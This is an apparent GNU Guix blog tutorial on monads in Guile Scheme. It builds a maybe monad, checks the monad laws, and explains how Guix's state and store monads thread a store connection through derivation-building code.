The Ties That >>= Us

First of all, we'll revert to our original definitions of remove-a and remove-b, that is to say, the ones that take a regular value and return a maybe.

(define (remove-a str)
  (if (eq? (string-ref str 0) #\a)
      (something (substring str 1))
      (nothing)))

(define (remove-b str)
  (if (eq? (string-ref str 0) #\b)
      (something (substring str 1))
      (nothing)))

What if we tried introducing higher-order procedures (procedures that accept other procedures as arguments) into the equation? Because we're functional programmers and we have an unhealthy obsession with that sort of thing.

(define (maybe-chain maybe proc)
  (if (maybe-is? maybe)
      (proc (maybe-value maybe))
      (nothing)))

(maybe-chain (something "abc")
             remove-a)
⇒ #<<maybe> is?: #t value: "bc">

(maybe-chain (nothing)
             remove-a)
⇒ #<<maybe> is?: #f value: #f>

It lives! To make it easier to compose procedures like this, we'll define a macro that allows us to perform any number of sequenced operations with only one composition form:

(define-syntax maybe-chain*
  (syntax-rules ()
    ((_ maybe proc)
     (maybe-chain maybe proc))
    ((_ maybe proc rest ...)
     (maybe-chain* (maybe-chain maybe proc)
                   rest ...))))

(maybe-chain* (something "abad")
              remove-a
              remove-b
              remove-a)
⇒ #<<maybe> is?: #t value: "d">
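The macro is not the only way to sequence several steps. As a sketch of an alternative, the same chaining can be written as an ordinary procedure that folds over a list of procedures. The name maybe-chain-all is an assumption made for this example:

```scheme
(use-modules (srfi srfi-1)
             (srfi srfi-9))

(define-record-type <maybe>
  (make-maybe is? value)
  maybe?
  (is? maybe-is?)
  (value maybe-value))

(define (something value)
  (make-maybe #t value))

(define (nothing)
  (make-maybe #f #f))

(define (remove-a str)
  (if (eq? (string-ref str 0) #\a)
      (something (substring str 1))
      (nothing)))

(define (remove-b str)
  (if (eq? (string-ref str 0) #\b)
      (something (substring str 1))
      (nothing)))

(define (maybe-chain maybe proc)
  (if (maybe-is? maybe)
      (proc (maybe-value maybe))
      (nothing)))

;; Hypothetical procedural counterpart of 'maybe-chain*': thread
;; MAYBE through PROCS from left to right.
(define (maybe-chain-all maybe . procs)
  (fold (lambda (proc acc)
          (maybe-chain acc proc))
        maybe
        procs))

(maybe-chain-all (something "abad")
                 remove-a
                 remove-b
                 remove-a)   ;a maybe holding "d"
```

Being a procedure, maybe-chain-all can be used with apply on a list of steps computed at run time, which the macro cannot do.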

Congratulations, you've just implemented the bind operation, commonly written as >>=, for our maybe type. And it turns out that a monad is just any container-like value for which >>= (along with another procedure called return, which wraps a given value in the simplest possible form of a monad) has been implemented.

A more formal definition would be that a monad is a mathematical object composed of three parts: a type, a bind function, and a return function. So, how do monads relate to Guix?

New Wheel, Old Wheel

Now that we've reinvented the wheel, we'd better learn to use the original wheel. Guix provides a generic, high-level monads library, along with the two generic monads %identity-monad and %state-monad, and the Guix-specific %store-monad. Since maybe is not one of them, let's integrate our version into the Guix monad system!

First we'll import the module that provides the aforementioned library:

(use-modules (guix monads))

To define a monad's behaviour in Guix, we simply use the define-monad macro, and provide two procedures: bind, and return.

(define-monad %maybe-monad
  (bind maybe-chain)
  (return something))

bind is just the procedure that we use to compose monadic procedure calls together, and return is the procedure that wraps values in the most basic form of the monad. A properly implemented bind and return must follow the so-called monad laws:

  1. (bind (return x) proc) must be equivalent to (proc x).
  2. (bind monad return) must be equivalent to just monad.
  3. (bind (bind monad proc-1) proc-2) must be equivalent to (bind monad (lambda (x) (bind (proc-1 x) proc-2))).

Let's verify that our maybe-chain and something procedures adhere to the monad laws:

(define (mlaws-proc-1 x)
  (something (+ x 1)))

(define (mlaws-proc-2 x)
  (something (+ x 2)))

;; First law: the left identity.
(equal? (maybe-chain (something 0)
                     mlaws-proc-1)
        (mlaws-proc-1 0))
⇒ #t

;; Second law: the right identity.
(equal? (maybe-chain (something 0)
                     something)
        (something 0))
⇒ #t

;; Third law: associativity.
(equal? (maybe-chain (maybe-chain (something 0)
                                  mlaws-proc-1)
                     mlaws-proc-2)
        (maybe-chain (something 0)
                     (lambda (x)
                       (maybe-chain (mlaws-proc-1 x)
                                    mlaws-proc-2))))
⇒ #t
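The checks above only exercise something values, so it's worth a quick look at the empty case too. Here's a minimal, self-contained sketch you can paste into a fresh Guile REPL. The <maybe> record, something, nothing, and maybe-chain are our assumed reconstruction of the definitions from earlier in this post, while maybe=?, add-one, and always-fail are hypothetical helpers made up for this example.

```scheme
(use-modules (srfi srfi-9))

;; Assumed reconstruction of the maybe type used throughout this post.
(define-record-type <maybe>
  (make-maybe is? value)
  maybe?
  (is? maybe-is?)
  (value maybe-value))

(define (something value) (make-maybe #t value))
(define (nothing) (make-maybe #f #f))

;; bind: apply PROC to the wrapped value, or propagate the empty case.
(define (maybe-chain maybe proc)
  (if (maybe-is? maybe)
      (proc (maybe-value maybe))
      (nothing)))

;; Hypothetical helper: compare two maybe values field by field.
(define (maybe=? a b)
  (and (eq? (maybe-is? a) (maybe-is? b))
       (equal? (maybe-value a) (maybe-value b))))

;; Hypothetical monadic procedures: one succeeds, one always fails.
(define (add-one x) (something (+ x 1)))
(define (always-fail x) (nothing))

;; Second law with an empty value: binding `something' changes nothing.
(define right-identity-holds?
  (maybe=? (maybe-chain (nothing) something)
           (nothing)))

;; Third law when the first procedure fails: both groupings give nothing.
(define associativity-holds?
  (maybe=? (maybe-chain (maybe-chain (something 0) always-fail)
                        add-one)
           (maybe-chain (something 0)
                        (lambda (x)
                          (maybe-chain (always-fail x) add-one)))))
```

Both right-identity-holds? and associativity-holds? should come out as #t, which is what lets a failure anywhere in a chain propagate to the end without special handling.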

Now that we know they're valid, we can use the with-monad macro to tell Guix to use these specific implementations of bind and return, and the >>= macro to thread monads through procedure calls!

(with-monad %maybe-monad
  (>>= (something "aabbc")
       remove-a
       remove-a
       remove-b
       remove-b))
⇒ #<<maybe> is?: #t value: "c">

We can also now use return:

(with-monad %maybe-monad
  (return 32))
⇒ #<<maybe> is?: #t value: 32>

But Guix provides many interfaces that sit at a higher level than >>= and return, as we will see. There's mbegin, which evaluates monadic expressions without binding them to symbols, returning the last one. This, however, isn't particularly useful with our %maybe-monad, as it's only really usable if the monadic operations within have side effects, just like the non-monadic begin.

There's also mlet and mlet*, which do bind the results of monadic expressions to symbols, and are essentially equivalent to a chain of (>>= MEXPR (lambda (BINDING) ...)):

;; This is equivalent...
(mlet* %maybe-monad ((str -> "abad") ;non-monadic binding uses the -> symbol
                     (str1 (remove-a str))
                     (str2 (remove-b str1)))
  (remove-a str2))
⇒ #<<maybe> is?: #t value: "d">

;; ...to this:
(with-monad %maybe-monad
  (>>= (return "abad")
       (lambda (str)
         (remove-a str))
       (lambda (str1)
         (remove-b str1))
       (lambda (str2)
         (remove-a str2))))
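If you want to see the chaining without any macros in the way, here is a sketch in plain Guile that needs no Guix modules. It spells the bindings out as nested maybe-chain calls, so each result stays in scope for the steps that follow. The <maybe> record, maybe-chain, remove-a, and remove-b are assumed reconstructions of the definitions from earlier in this post, and remove-prefix-char is a hypothetical helper.

```scheme
(use-modules (srfi srfi-9))

;; Assumed reconstruction of the maybe type used throughout this post.
(define-record-type <maybe>
  (make-maybe is? value)
  maybe?
  (is? maybe-is?)
  (value maybe-value))

(define (something value) (make-maybe #t value))
(define (nothing) (make-maybe #f #f))

(define (maybe-chain maybe proc)
  (if (maybe-is? maybe)
      (proc (maybe-value maybe))
      (nothing)))

;; Hypothetical helper: build a procedure that strips a leading CHAR,
;; or returns nothing when the string doesn't start with it.
(define (remove-prefix-char char)
  (lambda (str)
    (if (and (not (string-null? str))
             (char=? (string-ref str 0) char))
        (something (substring str 1))
        (nothing))))

(define remove-a (remove-prefix-char #\a))
(define remove-b (remove-prefix-char #\b))

;; Each lambda is nested inside the previous one, so str, str1, and str2
;; are all visible in the innermost body.
(define result
  (maybe-chain (something "abad")
               (lambda (str)
                 (maybe-chain (remove-a str)
                              (lambda (str1)
                                (maybe-chain (remove-b str1)
                                             (lambda (str2)
                                               (remove-a str2))))))))

(maybe-value result) ; ⇒ "d"
```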

Various abstractions over these two exist too, such as mwhen (a when plus an mbegin), munless (an unless plus an mbegin), and mparameterize (dynamically-scoped value rebinding, like parameterize, in a monadic context). lift takes a procedure and a monad and creates a new procedure that returns a monadic value.

There are also interfaces for manipulating lists wrapped in monads; listm creates such a list, sequence turns a list of monads into a list wrapped in a monad, and the anym, mapm, and foldm procedures are like their non-monadic equivalents, except that they take monadic procedures and return their results wrapped in monads.
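To get a feel for the list procedures, here's a small sketch using %identity-monad, where a monadic value is simply the value itself, so ordinary procedures can stand in for monadic ones. It assumes Guix's modules are on your Guile load path (for instance inside guix repl); the names incremented and total are made up for this example.

```scheme
(use-modules (guix monads))

;; mapm takes the monad, a monadic procedure, and a list.
(define incremented
  (mapm %identity-monad (lambda (x) (+ x 1)) '(1 2 3)))

;; foldm calls its procedure with the current item and the accumulator.
(define total
  (foldm %identity-monad (lambda (item sum) (+ item sum)) 0 '(1 2 3)))

incremented ; ⇒ (2 3 4)
total       ; ⇒ 6
```

With a less trivial monad the shape of the calls stays the same; only the wrapping of the results changes.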

This is all well and good, you may be thinking, but why does Guix need a monad library, anyway? The answer is technically that it doesn't. But building on the monad API makes a lot of things much easier, and to learn why, we're going to look at one of Guix's built-in monads.

In a State

Guix implements a monad called %state-monad, and it works with single-argument procedures returning two values. Behold:

(with-monad %state-monad
  (return 33))
⇒ #<procedure 21dc9a0 at <unknown port>:1106:22 (state)>

The run-with-state procedure turns this procedure into an actually useful value, or, rather, two values:

(run-with-state (with-monad %state-monad (return 33))
  (list "foo" "bar" "baz"))
⇒ 33
⇒ ("foo" "bar" "baz")

What can this actually do for us, though? Well, it gets interesting if we do some >>=ing:

(define state-seq
  (mlet* %state-monad ((number (return 33)))
    (state-push number)))
state-seq
⇒ #<procedure 7fcb6f466960 at <unknown port>:1484:24 (state)>

(run-with-state state-seq (list 32))
⇒ (32)
⇒ (33 32)

(run-with-state state-seq (list 30 99))
⇒ (30 99)
⇒ (33 30 99)

What is state-push? It's a monadic procedure for %state-monad that takes whatever's currently in the first value (the primary value) and pushes it onto the second value (the state value), which is assumed to be a list, returning the old state value as the primary value and the new list as the state value.

So, when we do (run-with-state state-seq (list 32)), we're passing (list 32) as the initial state value, and then the mlet* form (which expands to >>=) passes that and 33 to state-push. What %state-monad allows us to do is thread together some procedures that require some kind of state, while essentially pretending the state value is stored globally, like you might do in, say, C, and then retrieve both the final state and the result at the end!
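It can help to see how little machinery this needs. Below is a simplified model of a state monad in plain Guile, with no Guix modules involved. All of the my-* names are hypothetical and this is not Guix's actual implementation, just a sketch of the same idea: a monadic value is a procedure from a state to two values.

```scheme
;; Hypothetical names (my-*): a simplified model, not Guix's actual code.

;; return: leave the state untouched and yield VALUE as the primary value.
(define (my-state-return value)
  (lambda (state)
    (values value state)))

;; bind: run MVALUE, then feed its primary value to MPROC and run the
;; resulting monadic value with the updated state.
(define (my-state-bind mvalue mproc)
  (lambda (state)
    (call-with-values
        (lambda () (mvalue state))
      (lambda (value new-state)
        ((mproc value) new-state)))))

;; Push VALUE onto the state list; the old state becomes the primary value.
(define (my-state-push value)
  (lambda (state)
    (values state (cons value state))))

;; Running a monadic value just means calling it with an initial state.
(define (my-run-with-state mvalue state)
  (mvalue state))

(define my-state-seq
  (my-state-bind (my-state-return 33) my-state-push))

;; Collect both returned values into a list so they are easy to inspect.
(call-with-values
    (lambda () (my-run-with-state my-state-seq (list 32)))
  list)
;; ⇒ ((32) (33 32))
```

The two elements of that list are the same primary value and state value that run-with-state gave us for state-seq above.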

If you're a bit confused, don't worry. We'll write some of our own %state-monad-based monadic procedures and hopefully all will become clear. Consider, for instance, the Fibonacci sequence, in which each value is computed by adding the previous two. We could use the %state-monad to compute Fibonacci numbers by storing the previous number as the primary value and the number before that as the state value:

(define (fibonacci-thing value)
  (lambda (state)
    (values (+ value state)
            value)))

Now we can feed our Fibonacci-generating procedure the first value using run-with-state and the second using return:

(run-with-state
    (mlet* %state-monad ((starting (return 1))
                         (n1 (fibonacci-thing starting))
                         (n2 (fibonacci-thing n1)))
      (fibonacci-thing n2))
  0)
⇒ 3
⇒ 2

(run-with-state
    (mlet* %state-monad ((starting (return 1))
                         (n1 (fibonacci-thing starting))
                         (n2 (fibonacci-thing n1))
                         (n3 (fibonacci-thing n2))
                         (n4 (fibonacci-thing n3))
                         (n5 (fibonacci-thing n4)))
      (fibonacci-thing n5))
  0)
⇒ 13
⇒ 8
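Since a %state-monad monadic value is only a procedure waiting for a state, we can also drive fibonacci-thing by hand, without mlet* or run-with-state. The sketch below is plain Guile; fibonacci-steps is a hypothetical helper that applies fibonacci-thing a given number of times, starting from primary value 1 and state 0 as in the examples above.

```scheme
(define (fibonacci-thing value)
  (lambda (state)
    (values (+ value state)
            value)))

;; Hypothetical helper: apply fibonacci-thing STEPS times by hand and
;; return the final primary value and state as a two-element list.
(define (fibonacci-steps steps)
  (let loop ((value 1) (state 0) (remaining steps))
    (if (zero? remaining)
        (list value state)
        (call-with-values
            (lambda () ((fibonacci-thing value) state))
          (lambda (next-value next-state)
            (loop next-value next-state (- remaining 1)))))))

(fibonacci-steps 3) ; ⇒ (3 2)
(fibonacci-steps 6) ; ⇒ (13 8)
```

Three and six steps match the two mlet* forms above, which call fibonacci-thing three and six times respectively. The monad's job is to do this state-passing for us.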

This is all very nifty, and possibly useful in general, but what does this have to do with Guix? Well, many Guix store-based operations are meant to be used in concert with yet another monad, called the %store-monad. But if we look at (guix store), where %store-monad is defined...

(define-alias %store-monad %state-monad)
(define-alias store-return state-return)
(define-alias store-bind state-bind)

It was all a shallow façade! All the "store monad" is is a special case of the state monad, where a value representing the store is passed as the state value.

Lies, Damned Lies, and Abstractions

We mentioned that, technically, we didn't need monads for Guix. Indeed, many (now deprecated) procedures take a store value as an argument, such as build-expression->derivation. However, monads are far more elegant and simplify store code by quite a bit.

build-expression->derivation, being deprecated, should of course never be used. For one thing, it uses the "quoted build expression" style, rather than G-expressions (we'll discuss gexps another time). The best way to create a derivation from some basic build code is to use the new-fangled gexp->derivation procedure:

(use-modules (guix gexp)
             (guix store)        ;with-store, run-with-store
             (guix derivations)  ;derivation-builder-arguments
             (gnu packages irc))

(define symlink-irssi
  (gexp->derivation "link-to-irssi"
    #~(symlink #$(file-append irssi "/bin/irssi") #$output)))
⇒ #<procedure 7fddcc7b81e0 at guix/gexp.scm:1180:2 (state)>

You don't have to understand the #~(...) form yet, only everything surrounding it. We can see that gexp->derivation returns a procedure taking the initial state (the store), just like our %state-monad procedures did. And just as we used run-with-state to pass the initial state to a %state-monad monadic value, we use our old friend run-with-store when we have a %store-monad monadic value!

(define symlink-irssi-drv
  (with-store store
    (run-with-store store
      symlink-irssi)))
⇒ #<derivation /gnu/store/q7kwwl4z6psifnv4di1p1kpvlx06fmyq-link-to-irssi.drv => /gnu/store/6a94niigx4ii0ldjdy33wx9anhifr25x-link-to-irssi 7fddb7ef52d0>

Let's just check this derivation is as expected by reading the code from the builder script.

(define symlink-irssi-builder
  (list-ref (derivation-builder-arguments symlink-irssi-drv) 1))

(call-with-input-file symlink-irssi-builder
  (lambda (port)
    (read port)))

⇒ (symlink
   "/gnu/store/hrlmypx1lrdjlxpkqy88bfrzg5p0bn6d-irssi-1.4.3/bin/irssi"
   ((@ (guile) getenv) "out"))

And indeed, it symlinks the irssi binary to the output path. Some other, higher-level, monadic procedures include interned-file, which copies a file from outside the store into it, and text-file, which copies some text into it. Generally, these procedures aren't used, as there are higher-level procedures that perform similar functions (which we will discuss later), but for the sake of this blog post, here's an example:

(with-store store
  (run-with-store store
    (text-file "unmatched-paren"
      "( <paren@disroot.org>")))
⇒ "/gnu/store/v6smacxvdk4yvaa3s3wmd54lixn1dp3y-unmatched-paren"
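For completeness, here's what the interned-file counterpart might look like. This is a sketch under a few assumptions: a running Guix daemon, Guix's modules on the Guile load path, and a readable file at /etc/hostname (any readable file will do). The names hostname-item and "hostname-copy" are arbitrary choices for this example.

```scheme
(use-modules (guix store)
             (guix monads))

;; Assumption: /etc/hostname exists on this machine; substitute any
;; readable file.  "hostname-copy" is an arbitrary store item name.
(define hostname-item
  (with-store store
    (run-with-store store
      (interned-file "/etc/hostname" "hostname-copy"))))
```

As with text-file, the value you get back is the file name of the new store item, which will differ from machine to machine.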

Conclusion

What have we learned about monads? The key points we can take away are:

  1. Monads are a way of composing together procedures and values that are wrapped in containers that give them extra context, like maybe values.
  2. Guix provides a high-level monad library that compensates for Guile's lack of static typing or an interface-like system.
  3. The (guix monads) module provides the state monad, which allows you to thread state through procedures, allowing you to essentially pretend it's a global variable that's modified by each procedure.
  4. Guix uses the store monad frequently to thread a store connection through procedures that need it.
  5. The store monad is really just the state monad in disguise, where the state value is used to thread the store object through monadic procedures.

If you've read this post in its entirety but still don't quite get it, don't worry. Try to modify and tinker about with the examples, and ask any questions on the IRC channel #guix:libera.chat or the mailing list at help-guix@gnu.org, and hopefully it will all click eventually!

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64 and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource